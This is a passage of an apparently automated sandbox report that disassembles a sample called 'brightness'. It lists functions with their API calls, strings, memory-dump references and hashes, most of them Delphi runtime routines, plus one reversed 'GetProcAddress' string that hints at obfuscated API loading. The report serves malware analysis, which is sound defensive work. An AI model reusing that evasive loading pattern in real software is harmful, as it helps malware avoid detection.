                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                            • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                            • API String ID: 1646373207-1918263038
                                                                                                                                            • Opcode ID: 017569ddddcbf55487ea83fb3721c385a0def85450551f5042b48f5967ee4038
                                                                                                                                            • Instruction ID: 55469d3b6759428fb289301d0905c9258bdfba89acc36e4911db46a57e4ae719
                                                                                                                                            • Opcode Fuzzy Hash: 017569ddddcbf55487ea83fb3721c385a0def85450551f5042b48f5967ee4038
                                                                                                                                            • Instruction Fuzzy Hash: 3C41E175A8421C5F562F6A6E74046EBBB9EDE8C7103A3843FFC04CB784DD2079524A69
                                                                                                                                            Function 027C6E58 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleA.KERNEL32(ole32.dll), ref: 027C6E5E
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 027C6E6F
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 027C6E7F
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 027C6E8F
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 027C6E9F
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 027C6EAF
                                                                                                                                            • GetProcAddress.KERNEL32(?,CoSuspendClassObjects), ref: 027C6EBF
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                            • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                                            • API String ID: 667068680-2233174745
                                                                                                                                            • Opcode ID: 56b1eb7e975ef5ecac2442502ddefc6eca339ef55e898646a1d9886283d53388
                                                                                                                                            • Instruction ID: e444a9cadd11d2cbdbc4f106b0ceb5350027b5e033880400e39441eadb2ef269
                                                                                                                                            • Opcode Fuzzy Hash: 56b1eb7e975ef5ecac2442502ddefc6eca339ef55e898646a1d9886283d53388
                                                                                                                                            • Instruction Fuzzy Hash: B0F022E1E863126FB3037F709DC59772F6EBE81B08320582EA642A9902DAB5C4144BA5
                                                                                                                                            Function 027B2530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 027B28CE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Message
                                                                                                                                            • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                                            • API String ID: 2030045667-32948583
                                                                                                                                            • Opcode ID: 157d6c0d23c46f5a30efb0928392508643ea32d1196ec544b1c6385447aaa736
                                                                                                                                            • Instruction ID: ac39043349bf1261966d26e7b6d4f379741b5dc27eeb0098eca5bce4f5523dc2
                                                                                                                                            • Opcode Fuzzy Hash: 157d6c0d23c46f5a30efb0928392508643ea32d1196ec544b1c6385447aaa736
                                                                                                                                            • Instruction Fuzzy Hash: 78A1D330A052688BDF23AA2CCC88BD9B6E5EF09354F1441E5ED49AB287CF7589C5CF51
                                                                                                                                            Function 027B252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • , xrefs: 027B2814
                                                                                                                                            • Unexpected Memory Leak, xrefs: 027B28C0
                                                                                                                                            • The sizes of unexpected leaked medium and large blocks are: , xrefs: 027B2849
                                                                                                                                            • An unexpected memory leak has occurred. , xrefs: 027B2690
                                                                                                                                            • The unexpected small block leaks are:, xrefs: 027B2707
                                                                                                                                            • 7, xrefs: 027B26A1
                                                                                                                                            • bytes: , xrefs: 027B275D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                                            • API String ID: 0-2723507874
                                                                                                                                            • Opcode ID: 873041493bad0c02da599a51ac789f7dd62a4e4792e13a61ea065e4aabac08cf
                                                                                                                                            • Instruction ID: a2537aa936eb1c713f5d0cd7c9078b870290978a2bb8429592012f6cde8028fb
                                                                                                                                            • Opcode Fuzzy Hash: 873041493bad0c02da599a51ac789f7dd62a4e4792e13a61ea065e4aabac08cf
                                                                                                                                            • Instruction Fuzzy Hash: 4471A230A052988FDF23AA2CCC88BD9BAE5EF09744F1041E5D949EB286DB7549C5CF51
                                                                                                                                            Function 027BBD40 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetThreadLocale.KERNEL32(00000000,027BC00B,?,?,00000000,00000000), ref: 027BBD76
                                                                                                                                              • Part of subcall function 027BA744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 027BA762
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$InfoThread
                                                                                                                                            • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                            • API String ID: 4232894706-2493093252
                                                                                                                                            • Opcode ID: b959efed5059926c61ff7bdee8ecd6aedc05ba36c45d4b44a6447f5b446a1a84
                                                                                                                                            • Instruction ID: b5a075319af5ca658edf366cfff6ac3a00c71e1c78563765c88cf4323824d516
                                                                                                                                            • Opcode Fuzzy Hash: b959efed5059926c61ff7bdee8ecd6aedc05ba36c45d4b44a6447f5b446a1a84
                                                                                                                                            • Instruction Fuzzy Hash: 45613F39B041499FDB03FBA4DC68BDFB7BB9F88300F109439A6019B785DA35D9059B64
                                                                                                                                            Function 027CAE18 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000004), ref: 027CAE38
                                                                                                                                            • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 027CAE4F
                                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000004), ref: 027CAEE3
                                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000002), ref: 027CAEEF
                                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000014), ref: 027CAF03
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Read$HandleModule
                                                                                                                                            • String ID: KernelBase$LoadLibraryExA
                                                                                                                                            • API String ID: 2226866862-113032527
                                                                                                                                            • Opcode ID: 0d0ce0ec0d763cc8ff08f2d1832294e21bb331bf7483512a181434e11ef26bf1
                                                                                                                                            • Instruction ID: 6c9bb2b03a8ec4bb815c81fb9bd2b16cdce6652755f9f097ee5424d088a3eb7b
                                                                                                                                            • Opcode Fuzzy Hash: 0d0ce0ec0d763cc8ff08f2d1832294e21bb331bf7483512a181434e11ef26bf1
                                                                                                                                            • Instruction Fuzzy Hash: 783142F1A40309BBDB11DF78CC89F9A77A8AF05769F20451CEA55AB2C0D770E940CBA1
                                                                                                                                            Function 027B432C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,027B43F3,?,?,028117C8,?,?,027DE7A8,027B655D,027DD30D), ref: 027B4365
                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,027B43F3,?,?,028117C8,?,?,027DE7A8,027B655D,027DD30D), ref: 027B436B
                                                                                                                                            • GetStdHandle.KERNEL32(000000F5,027B43B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,027B43F3,?,?,028117C8), ref: 027B4380
                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F5,027B43B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,027B43F3,?,?), ref: 027B4386
                                                                                                                                            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 027B43A4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileHandleWrite$Message
                                                                                                                                            • String ID: Error$Runtime error at 00000000
                                                                                                                                            • API String ID: 1570097196-2970929446
                                                                                                                                            • Opcode ID: 570cf18b454995dcd94e95e550e0b2ced480df24e28a6e50334e4203c6760fa8
                                                                                                                                            • Instruction ID: a046856330f6e42826435f6d897e96a5dde4e7ecf16c899fe36e359072a9e353
                                                                                                                                            • Opcode Fuzzy Hash: 570cf18b454995dcd94e95e550e0b2ced480df24e28a6e50334e4203c6760fa8
                                                                                                                                            • Instruction Fuzzy Hash: 3BF02BE9AC030479F663A2606C79FD93B2C0F14F20F548A04F334B90C58BA050C48725
                                                                                                                                            Function 027BAE44 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027BACBC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 027BACD9
                                                                                                                                              • Part of subcall function 027BACBC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 027BACFD
                                                                                                                                              • Part of subcall function 027BACBC: GetModuleFileNameA.KERNEL32(027B0000,?,00000105), ref: 027BAD18
                                                                                                                                              • Part of subcall function 027BACBC: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 027BADAE
                                                                                                                                            • CharToOemA.USER32(?,?), ref: 027BAE7B
                                                                                                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 027BAE98
                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 027BAE9E
                                                                                                                                            • GetStdHandle.KERNEL32(000000F4,027BAF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 027BAEB3
                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,027BAF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 027BAEB9
                                                                                                                                            • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 027BAEDB
                                                                                                                                            • MessageBoxA.USER32(00000000,?,?,00002010), ref: 027BAEF1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 185507032-0
                                                                                                                                            • Opcode ID: 88d02b8fd42cd6e4e5352f058b6200d7a6cde75b5e6a228ff718e04ac43e3d69
                                                                                                                                            • Instruction ID: 576061c13ba665a479a15a5a62ab45ac3a8958c779a4808c27be8a8c70f4b804
                                                                                                                                            • Opcode Fuzzy Hash: 88d02b8fd42cd6e4e5352f058b6200d7a6cde75b5e6a228ff718e04ac43e3d69
                                                                                                                                            • Instruction Fuzzy Hash: 10117CB6948205BED303FBA4CC89FDB77EEAF45300F400929B754D60E0DA70E9448B66
                                                                                                                                            Function 027BE50C Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 027BE5A5
                                                                                                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 027BE5C1
                                                                                                                                            • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 027BE5FA
                                                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 027BE677
                                                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 027BE690
                                                                                                                                            • VariantCopy.OLEAUT32(?,00000000), ref: 027BE6C5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 351091851-0
                                                                                                                                            • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                            • Instruction ID: 4c8d7b4b68f93dbc432b9af9b88e4f8263cc8a568acda10edcd41f3aa872fcec
                                                                                                                                            • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                            • Instruction Fuzzy Hash: 3251C375A0062D9BCB23DB68CC98BD9B3BDAF4D304F4441E5E609A7301DA30AF858F60
                                                                                                                                            Function 027B3568 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 027B358A
                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,027B35D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 027B35BD
                                                                                                                                            • RegCloseKey.ADVAPI32(?,027B35E0,00000000,?,00000004,00000000,027B35D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 027B35D3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                            • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                            • API String ID: 3677997916-4173385793
                                                                                                                                            • Opcode ID: e578831ae2ff913daa70c995d1c92caeebf2ca00b97158658a8c147512868ef5
                                                                                                                                            • Instruction ID: 3b2342248b1fba46a7155d628da6ca4f998e41317205c7c3bd690dd332ab7d63
                                                                                                                                            • Opcode Fuzzy Hash: e578831ae2ff913daa70c995d1c92caeebf2ca00b97158658a8c147512868ef5
                                                                                                                                            • Instruction Fuzzy Hash: 7B01F5B5E40218BAE713DBA09C02BFE77FCDF08700F6005A1BA04D6580E674A650CA68
                                                                                                                                            Function 027C80C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027C8148,?,?,00000000,00000000,?,027C8061,00000000,KernelBASE,00000000,00000000,027C8088), ref: 027C810D
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027C8113
                                                                                                                                            • GetProcAddress.KERNEL32(?,?), ref: 027C8125
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                            • String ID: Kernel32$sserddAcorPteG
                                                                                                                                            • API String ID: 667068680-1372893251
                                                                                                                                            • Opcode ID: 75e638e3d50de05996a27b57333abb445c96e9cb1e3975547385163786482340
                                                                                                                                            • Instruction ID: 4b8148d5667af2fbc2cbf1e299667464dacfe1c47d06bbbb99a79c23ca2f1fce
                                                                                                                                            • Opcode Fuzzy Hash: 75e638e3d50de05996a27b57333abb445c96e9cb1e3975547385163786482340
                                                                                                                                            • Instruction Fuzzy Hash: 78014478A40308AFE717EBB4D865B9E77EEEF49710F51446CE500D7750D670A9108B11
                                                                                                                                            Function 027BA9D0 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetThreadLocale.KERNEL32(?,00000000,027BAA67,?,?,00000000), ref: 027BA9E8
                                                                                                                                              • Part of subcall function 027BA744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 027BA762
                                                                                                                                            • GetThreadLocale.KERNEL32(00000000,00000004,00000000,027BAA67,?,?,00000000), ref: 027BAA18
                                                                                                                                            • EnumCalendarInfoA.KERNEL32(Function_0000A91C,00000000,00000000,00000004), ref: 027BAA23
                                                                                                                                            • GetThreadLocale.KERNEL32(00000000,00000003,00000000,027BAA67,?,?,00000000), ref: 027BAA41
                                                                                                                                            • EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000003), ref: 027BAA4C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4102113445-0
                                                                                                                                            • Opcode ID: 564328fc7df54de99ca6cb2456252592452f2853e91a682962ca2a3f76424f12
                                                                                                                                            • Instruction ID: b834348513bca019b1251e73aba89309fb153f48af6af666afb2907f8da4fbf4
                                                                                                                                            • Opcode Fuzzy Hash: 564328fc7df54de99ca6cb2456252592452f2853e91a682962ca2a3f76424f12
                                                                                                                                            • Instruction Fuzzy Hash: 7A01F2756402586BF703BA788D26BEE775DDF4B724FA10120F610E6AC4DA649E004A78
                                                                                                                                            Function 027BAA80 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetThreadLocale.KERNEL32(?,00000000,027BAC50,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 027BAAAF
                                                                                                                                              • Part of subcall function 027BA744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 027BA762
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$InfoThread
                                                                                                                                            • String ID: eeee$ggg$yyyy
                                                                                                                                            • API String ID: 4232894706-1253427255
                                                                                                                                            • Opcode ID: 8aaaa9463fb1f7724fabdff3082ad2239fc1caf5697e65a67c2963e7106fe22a
                                                                                                                                            • Instruction ID: 45d01fce6288ff132a859b52d81b9806c57ff255324a9e4e16b79ef837d17a09
